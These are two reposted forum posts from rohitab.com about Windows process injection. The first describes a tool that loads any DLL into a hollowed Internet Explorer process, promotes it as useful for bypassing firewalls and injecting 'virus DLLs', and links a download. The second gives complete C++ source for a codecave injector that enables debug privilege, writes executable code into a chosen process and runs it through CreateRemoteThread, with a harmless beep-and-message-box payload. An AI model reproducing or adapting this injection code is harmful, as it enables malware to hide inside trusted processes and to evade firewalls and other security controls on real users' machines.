[h=1]DLL injector that inject DLL into Internet Explorer[/h]Started By zwclose7, Dec 17 2012 01:14 PM [h=3]zwclose7 IE Injector (ieinj) allow you to inject any DLLs into Internet Explorer (iexplore.exe). The process only serves as a host for the DLL and the origial code of Internet Explorer is not executed.[/h]Usage: ieinj [DLL path] The steps of DLL injection: 1) Read the DLL path form the command line. 2) Search for the Internet Explorer executable file (iexplore.exe) from Program Files folder. 3) Start the Internet Explorer. 4) Write the DLL path into target process's memory. 5) Create a remote thread to load the DLL. 6) The injected DLL will execute it code from the DllMain function. 7) Terminate the primary thread of Internet Explorer so the origial code of the IE is not executed. 8) The injected DLL can create a new thread to execute it code. The code will execute within the Internet Explorer. http://www.youtube.com/watch?v=dm0gGmjmKOc&feature=player_embedded Note: Your DLL must have the DllMain function to execute code or the process will exit after the injection. This tool is useful for bypassing firewalls since Internet Explorer is allowed to access network by most firewalls. This tool is also useful for injecting virus DLLs into Internet Explorer. The file dll.dll is an example DLL to test the injector. The DLL will display a message box when it is loaded into a process. Download here http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=3745 Sursa: DLL injector that inject DLL into Internet Explorer - rohitab.com - Forums

[h=1]My codecave injector[/h] Started By zwclose7, Yesterday, 04:57 AM [h=3]zwclose7 This is my first codecave injector. It inject a codecave into another process. The injected codecave will play a beep sound, and than display a message box.[/h] #include <iostream> #include <Windows.h> using namespace std; typedef BOOL (WINAPI *fnBeep)(DWORD,DWORD); typedef int (WINAPI *fnMessageBoxA)(HWND,LPCSTR,LPCSTR,UINT); struct PARAMETERS{ DWORD BEEP; DWORD MSGBOX; DWORD freq; DWORD time; HWND hWnd; char text[60]; char title[60]; UINT type; }; static DWORD ThreadProc(PARAMETERS * data){ fnBeep beep=(fnBeep)data->BEEP; fnMessageBoxA msgbox=(fnMessageBoxA)data->MSGBOX; beep(data->freq,data->time); msgbox(data->hWnd,data->text,data->title,data->type); return 0; } static DWORD Useless(){ return 0; } int main(){ DWORD PID; DWORD TID; DWORD exts; HANDLE hToken; LUID luid; LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid); TOKEN_PRIVILEGES tp; tp.Privileges[0].Luid=luid; tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; tp.PrivilegeCount=1; OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken); AdjustTokenPrivileges(hToken,false,&tp,sizeof(tp),NULL,NULL); PARAMETERS data; data.freq=1000; data.time=1000; data.hWnd=0; strcpy(data.text,"Hello world"); strcpy(data.title,"Codecave"); data.type=MB_ICONINFORMATION; HMODULE k32=LoadLibrary("kernel32.dll"); HMODULE u32=LoadLibrary("user32.dll"); data.BEEP=(DWORD)GetProcAddress(k32,"Beep"); data.MSGBOX=(DWORD)GetProcAddress(u32,"MessageBoxA"); DWORD SizeofProc=(LPBYTE)Useless-(LPBYTE)ThreadProc; cout <<"Enter PID: "; cin >>PID; HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,false,PID); if(hProcess==NULL){ cout <<"\nUnable to open process handle.\n\n"; return 1; } cout <<"\nProcess handle opened.\n\n"; cout <<"Allocating memory for thread data.\n\n"; HANDLE pData=VirtualAllocEx(hProcess,NULL,256,MEM_COMMIT,PAGE_READWRITE); if(pData==NULL){ cout <<"Unable to allocate memory for thread data.\n\n"; CloseHandle(hProcess); return 1; } cout <<"Allocating memory for thread code.\n\n"; HANDLE code=VirtualAllocEx(hProcess,NULL,256,MEM_COMMIT,PAGE_EXECUTE_READWRITE); if(code==NULL){ cout <<"Unable to allocate memory for thread code.\n\n"; CloseHandle(hProcess); return 1; } cout <<"Writing thread data to target process.\n\n"; if(!WriteProcessMemory(hProcess,pData,&data,sizeof(data),NULL)){ cout <<"Unable to write thread data to target process.\n\n"; CloseHandle(hProcess); return 1; } cout <<"Writing thread code to target process.\n\n"; if(!WriteProcessMemory(hProcess,code,(void*)ThreadProc,SizeofProc,NULL)){ cout <<"Unable to write thread code to target process.\n\n"; CloseHandle(hProcess); return 1; } cout <<"Data address: "<<pData<<"\n\n"; cout <<"Code address: "<<code<<"\n\n"; cout <<"Creating remote thread within target process.\n\n"; HANDLE hThread=CreateRemoteThread(hProcess,NULL,0,(LPTHREAD_START_ROUTINE)code,pData,0,&TID); if(hThread==NULL){ cout <<"Unable to create remote thread within target process.\n\n"; CloseHandle(hProcess); return 1; } cout <<"Thread created. Thread ID: "<<TID<<"\n\n"; cout <<"Waiting for the thread to terminate.\n\n"; WaitForSingleObject(hThread,INFINITE); GetExitCodeThread(hThread,&exts); cout <<"Thread terminated with status code "<<exts<<".\n\n"; cout <<"Closing thread handle.\n\n"; CloseHandle(hThread); cout <<"Closing process handle.\n\n"; CloseHandle(hProcess); return 0; } Sursa: My codecave injector - rohitab.com - Forums